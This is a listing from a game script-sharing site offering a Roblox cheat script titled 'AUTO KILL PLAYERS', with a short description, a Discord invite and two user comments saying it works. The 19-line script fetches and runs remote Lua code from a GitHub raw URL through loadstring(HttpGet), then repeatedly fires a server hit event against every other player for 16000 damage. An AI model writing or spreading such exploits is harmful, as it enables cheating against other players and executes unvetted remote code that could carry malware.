ADVERTISEMENTREMOVE ADS
AUTO KILL PLAYERS | OP SCRIPT XD
50,072 views

Script Preview
Description
made this script for fun in this game it just auto kill all players instantly lol anways enjoy and joinn my discorddd reeee https://discord.gg/dmyAajpVKw
Features:
- auto kill
Tested with
ADVERTISEMENTREMOVE ADS
19 Lines • 647 Bytes
Verified
loadstring(game:HttpGet("https://raw.githubusercontent.com/FlamesIsCool/FlamezHub/refs/heads/main/discordjoin.lua"))()
local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local LocalPlayer = Players.LocalPlayer
local PlayerHitEvent = ReplicatedStorage:WaitForChild("PlayerHitEvent")
while task.wait(0.1) do
for _, player in ipairs(Players:GetPlayers()) do
if player ~= LocalPlayer then
local args = {
[1] = player,
[2] = 16000
}
PlayerHitEvent:FireServer(unpack(args))
end
end
end
ADVERTISEMENTREMOVE ADS
ADVERTISEMENTREMOVE ADS





Comments
Worked great
Works but makes your ping go high